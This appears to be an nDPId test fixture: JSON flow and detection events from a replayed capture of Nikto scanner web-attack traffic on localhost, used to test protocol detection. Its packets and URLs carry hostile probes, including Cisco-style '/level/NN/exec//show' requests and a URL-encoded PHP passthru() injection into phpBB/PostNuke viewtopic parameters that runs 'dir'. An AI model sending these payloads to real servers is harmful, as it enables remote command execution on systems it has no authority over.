+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1576420277730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277730,"pkt":"AAAAAAAAAAAAAAAACABFAADIHv9AAEAGHS9\/AAABfwAAAcaeH5AL7Sfmt4JqA4AYAED+vAAAAQEICp1m\/wqdZv8KR0VUIC9sZXZlbC85NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDEpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":642,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/94\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001341)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1576420277732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277732,"pkt":"AAAAAAAAAAAAAAAACABFAADIPWZAAEAG\/sd\/AAABfwAAAcagH5BD6AR+QNLU5oAYAED+vAAAAQEICp1m\/wydZv8MR0VUIC9sZXZlbC85NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277732,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/95\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001342)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1576420277734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277734,"pkt":"AAAAAAAAAAAAAAAACABFAADISBNAAEAG9Bp\/AAABfwAAAcaiH5A0bnEJpPWxcYAYAED+vAAAAQEICp1m\/w6dZv8OR0VUIC9sZXZlbC85Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1576420277736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277736,"pkt":"AAAAAAAAAAAAAAAACABFAADIC2JAAEAGMMx\/AAABfwAAAcakH5C2tzJ7p90VYYAYAED+vAAAAQEICp1m\/xCdZv8PR0VUIC9sZXZlbC85Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1576420277737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277737,"pkt":"AAAAAAAAAAAAAAAACABFAADIqydAAEAGkQZ\/AAABfwAAAcamH5BRA5JApfKSEYAYAED+vAAAAQEICp1m\/xGdZv8RR0VUIC9sZXZlbC85OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1576420277739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277739,"pkt":"AAAAAAAAAAAAAAAACABFAADI+OxAAEAGQ0F\/AAABfwAAAcaoH5BlRMHxT\/ad\/4AYAED+vAAAAQEICp1m\/xOdZv8SR0VUIC9sZXZlbC85OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1576420277741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277741,"pkt":"AAAAAAAAAAAAAAAACABFAAFdQfFAAEAG+ad\/AAABfwAAAcaqH5DRIHj1tdpDy4AYAED\/UQAAAQEICp1m\/xWdZv8VR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM4OCkNCg0K"} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1576420277743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277743,"pkt":"AAAAAAAAAAAAAAAACABFAAFGAG5AAEAGO0J\/AAABfwAAAcasH5AOKDl4jiUqhYAYAED\/OgAAAQEICp1m\/xedZv8XR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzg5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1576420277745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277745,"pkt":"AAAAAAAAAAAAAAAACABFAAFddiRAAEAGxXR\/AAABfwAAAcauH5DeiE8\/TEH5WoAYAED\/UQAAAQEICp1m\/xmdZv8ZR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1576420277746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277746,"pkt":"AAAAAAAAAAAAAAAACABFAAFmjyxAAEAGrGN\/AAABfwAAAcawH5C1dLY3dpi6dIAYAED\/WgAAAQEICp1m\/xqdZv8aR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 